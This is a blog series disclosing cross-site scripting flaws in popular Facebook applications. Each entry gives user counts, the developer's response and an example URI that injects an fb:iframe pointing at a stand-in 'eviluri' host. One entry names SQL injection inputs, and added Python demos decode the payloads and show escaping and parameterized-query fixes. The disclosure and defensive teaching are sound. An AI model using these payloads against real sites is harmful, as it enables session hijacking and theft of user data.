FAXX Hack: My Zoo

Current Monthly Active Users: 953,784

Current Rank on Application Leaderboard: 124

Application Developer: Eyrewood Studios

Responsiveness: I did not find direct contact information for the developer, so I forwarded this request to Facebook, and the hole has since been patched.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/myownzoo/friends.php?uid=1527549541%5C%27%2F%3E%3Cfb%3Aiframe%20src%3D%22http%3A%2F%2Feviluri%22%3E


FAXX Hack: Hugged

Facebook Verified Application

Current Monthly Active Users: 3,169,974

Current Rank on Application Leaderboard: 51

Application Developer: Manakki

Responsiveness: I did not receive any responses from Manakki, but they did patch the hole – the example URI below now brings up a page that says, “Please go away.”

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/huggees/experi?hid=318&idz=1077687358%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E


FAXX Hack: SocialCalendar

Facebook Verified Application

Current Monthly Active Users: 1,661,572

Current Rank on Application Leaderboard: 93

Application Developer: SocialCalendar.com

Responsiveness: I received an e-mail back from SocialCalendar the day after contacting them, and they noted that they take information security seriously.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/socialcal/?x=0&ref=&sc_op=showView&sc_v=movieList&sc_movie_category=upcoming&sc_page=1%3Cfb:iframe+src%3D%22http://eviluri/%22%3E&sc_max_page_viewed=1

Example POST Request: http://apps.facebook.com/socialcal/?sc_movie_search_type=NAME&sc_movie_search_query="/><fb:iframe src="http://eviluri/">&sc_op=showView&sc_v=movieSearch


FAXX Hack: Circle of Friends

Posting these is not an automated process, and I was on the road most of yesterday, so again I apologize for being a day late. This counts as Friday’s FAXX Hack.

Current Monthly Active Users: 635,797

Current Rank on Application Leaderboard: 172

Application Developer: Bantr

Responsiveness: I received an e-mail about a day after reporting the hole to let me know that Bantr had fixed it.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/friendcircles/circle_settings.php?circle_id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E


FAXX Hack: Brain Buddies

Facebook Verified Application

Current Monthly Active Users: 4,861,078

Current Rank on Application Leaderboard: 38

Application Developer: wooga – world of gaming

Responsiveness: Wooga did not send any messages, but did patch the hole.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/brainbuddies/?ref=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E


FAXX Hack: NetworkedBlogs

Reported By: Tom Eston

Current Monthly Active Users: 674,027

Current Rank on Application Leaderboard: 164

Application Developer: Ninua, Inc.

Responsiveness: Ninua responded quickly and issued a patch within 24 hours. Furthermore, they went back and scanned all of their pages for holes, then did a second sweep the next week.

Vulnerability Status: Patched

Technical Details:

  1. One could insert FBML into the Link Name field for links in a user’s profile. This code would then be rendered when someone viewed the profile.
  2. At least one page appeared to have a SQL injection hole. As an example, searching for \'test produced a lengthy SQL error.
  3. One page, http://apps.facebook.com/blognetworks/userpage.php, was vulnerable to both SQL injection and XSS by inserting text into the uid parameter, such as \<img src="">.
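The second item above says only that a search for \'test produced a database error. The following added example (not NetworkedBlogs' code; the table, column and query shape are assumptions, and the rows are constructed) reproduces that symptom against an in-memory SQLite table and sets it beside the parameterized query that fixes it. The point to take away: the backslash-quote ends the string literal early when the input is spliced into SQL text, and the resulting parse error is exactly the kind of message the post reports the application leaking.

```python
"""Concatenated vs. parameterized search, added as an illustration of item 2.

Uses an in-memory SQLite table with constructed rows; the schema and the
LIKE query are assumptions, not the application's real code.
"""
import sqlite3


def make_db():
    """Constructed sample data standing in for a blog directory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE blogs (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO blogs (name) VALUES (?)",
        [("test blog",), ("my test feed",), ("unrelated",)],
    )
    return conn


def search_concat(conn, query):
    """Vulnerable form: the search term is spliced into the SQL text.

    For the input \\'test the literal '%\\' closes early and the remainder
    (test%') no longer parses, so the database raises an error instead of
    returning rows.
    """
    sql = "SELECT name FROM blogs WHERE name LIKE '%" + query + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_param(conn, query):
    """Hardened form: the term is bound as a parameter, never parsed as SQL."""
    sql = "SELECT name FROM blogs WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + query + "%",))]


def probe(query):
    """Run both forms on a fresh table.

    Returns (concatenated result, or the error class name if it blew up,
             parameterized result).
    """
    conn = make_db()
    try:
        concat = search_concat(conn, query)
    except sqlite3.Error as exc:
        concat = type(exc).__name__
    return concat, search_param(conn, query)


if __name__ == "__main__":
    for term in ("test", "\\'test"):
        concat, param = probe(term)
        print(f"{term!r}: concatenated -> {concat}   parameterized -> {param}")
```

The parameterized version treats the backslash and quote as ordinary characters to match, so the hostile input simply returns no rows rather than an error page.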

Notes: This is the first example of a persistent XSS hole in a Facebook application that I became aware of, and full credit for the find goes to security researcher Tom Eston, one of the main people behind SocialMediaSecurity.com.


Minor Changes to the Month of Facebook Bugs

For the second half of the FAXX Hacks series, I will be making two changes. First, I will no longer indicate whether a vulnerability is also susceptible to clickjacking installs. This project has taken a good deal of volunteered time, and I’ve already shown that over half of the first 15 vulnerabilities could be used with clickjacking.

Second, the example URIs for the next 15 applications will simply demonstrate inserting an fb:iframe tag. Working out the details of the full double-injection trick I’ve previously demonstrated usually takes considerably more time than checking for clickjacking, and thus far has nearly always been possible. When I release demonstration attack code in October, I also plan on giving a more thorough explanation of the double-injection technique.
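To make the fb:iframe insertion concrete, here is an added example (mine, not code from the series or from any of the applications) that decodes three of the example URIs quoted earlier in this page, feeds the decoded parameter through an assumed vulnerable template and through the same template with HTML escaping, and reports whether an fb:iframe tag appears in the output. The template using fb:name is an assumption about what such a page might echo the parameter into; the application names, parameter names and URIs are taken from the posts above. Because Facebook rendered FBML server-side, an injected fb:iframe became a real iframe pointing at the attacker's host.

```python
"""Decode FAXX example URIs and show the injection against an assumed template.

Added example. PAGE_URIS copies URIs quoted on this page; render_vulnerable
and render_escaped are assumed templates, not the applications' code.
"""
import html
import re
from urllib.parse import parse_qs, urlsplit

# (vulnerable parameter name, example URI) as quoted in the posts above.
PAGE_URIS = {
    "My Zoo": (
        "uid",
        "http://apps.facebook.com/myownzoo/friends.php?uid=1527549541%5C%27%2F%3E"
        "%3Cfb%3Aiframe%20src%3D%22http%3A%2F%2Feviluri%22%3E",
    ),
    "Hugged": (
        "idz",
        "http://apps.facebook.com/huggees/experi?hid=318&idz=1077687358%22%2F%3E"
        "%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E",
    ),
    "Circle of Friends": (
        "circle_id",
        "http://apps.facebook.com/friendcircles/circle_settings.php?circle_id="
        "%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E",
    ),
}

# Matches an fb:iframe tag and captures its src attribute.
FB_IFRAME = re.compile(r'<fb:iframe\s+src="([^"]*)"', re.IGNORECASE)


def decode_param(uri, name):
    """Return the named query parameter after one round of %xx/+ decoding,
    i.e. the value the application's server-side code actually received."""
    params = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    return params[name][0]


def render_vulnerable(value):
    """Assumed vulnerable template: the parameter lands inside an FBML
    attribute unescaped. The payload closes the attribute and the tag,
    then appends its own fb:iframe."""
    return f'<div class="page"><fb:name uid="{value}" /></div>'


def render_escaped(value):
    """Hardened form of the same template: escape &, <, >, " and ' before
    interpolating, so the payload stays inside the attribute as text."""
    safe = html.escape(value, quote=True)
    return f'<div class="page"><fb:name uid="{safe}" /></div>'


def injected_iframes(rendered):
    """List the src of every fb:iframe in the markup. This page never emits
    fb:iframe itself, so any hit is attacker-supplied."""
    return FB_IFRAME.findall(rendered)


def check(app_name):
    """Decode the page's example URI for one app and test both templates."""
    param, uri = PAGE_URIS[app_name]
    value = decode_param(uri, param)
    return {
        "decoded": value,
        "vulnerable": injected_iframes(render_vulnerable(value)),
        "escaped": injected_iframes(render_escaped(value)),
    }


if __name__ == "__main__":
    for app in PAGE_URIS:
        result = check(app)
        print(f"{app}: decoded={result['decoded']!r}")
        print(f"  vulnerable -> {result['vulnerable']}   escaped -> {result['escaped']}")
```

Note that the Brain Buddies URI on this page is encoded twice; running it through decode_param once still leaves a percent-encoded prefix, which is the kind of multi-stage encoding the double-injection trick relies on.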

Thanks for reading and I hope you enjoy the rest of the series – if you think the first half exhausted all the applications with large userbases, think again.


The Month of Facebook Bugs Halfway Report

A few weeks ago, I announced my plan to post a series of FAXX (Facebook Application XSS+XSRF) hacks. In the spirit of previous series of vulnerability disclosures, I elected to post a new hole every day for the month of September. The effort quickly became known as the Month of Facebook Bugs, and today marks the halfway point.

Thus far, counting the “Make a Gift!” vulnerability as affecting one application, I’ve reported on 19 vulnerable applications, and all but one are patched. Of those 19 applications, 12 are Facebook Verified Applications, and 13 are capable of clickjacking installs. All types of applications have appeared in the series so far, with several coming from the top 10 by monthly active users. Ignoring any overlap and simply totaling all of the monthly active user figures from the 19 reports, the tally of vulnerable users would stand at just over 169 million. However, an application vulnerability affects any user who has ever authorized the application, regardless of how often they use it. Furthermore, a user who has not authorized an application is still susceptible to a clickjacking install.

The primary purpose of this series is to raise awareness, and with several audiences. First, many Facebook users apply the same level of trust to Facebook applications that they give to Facebook itself, and are completely unaware of application-based attacks or the prevalence of application vulnerabilities. Second, many application developers are overlooking basic security practices for web applications. Third, the technology community has not always seemed to realize the magnitude of issues present in the Facebook Platform today.

In fact, while I may ensure that 30 applications get patched, if a 31st remains vulnerable, users remain vulnerable. I’ve outlined before some of the problems I see in the architecture of the Platform, and I’ve sent those concerns to Facebook in communicating with them about these application holes. I’ve not received a response thus far, and honestly don’t expect one, but I do hope this month-long series helps illustrate more vividly why I’ve raised such concerns.

As of today, I have uncovered enough FAXX hacks to last through the rest of September. I’ve already made an effort to contact every developer affected to give them time for patches. Once the month ends, I plan on releasing source code that demonstrates how a FAXX hack can be exploited to steal profile information and launch viral attacks. In the meantime, thanks to everyone for help and feedback – and please keep spreading the word.

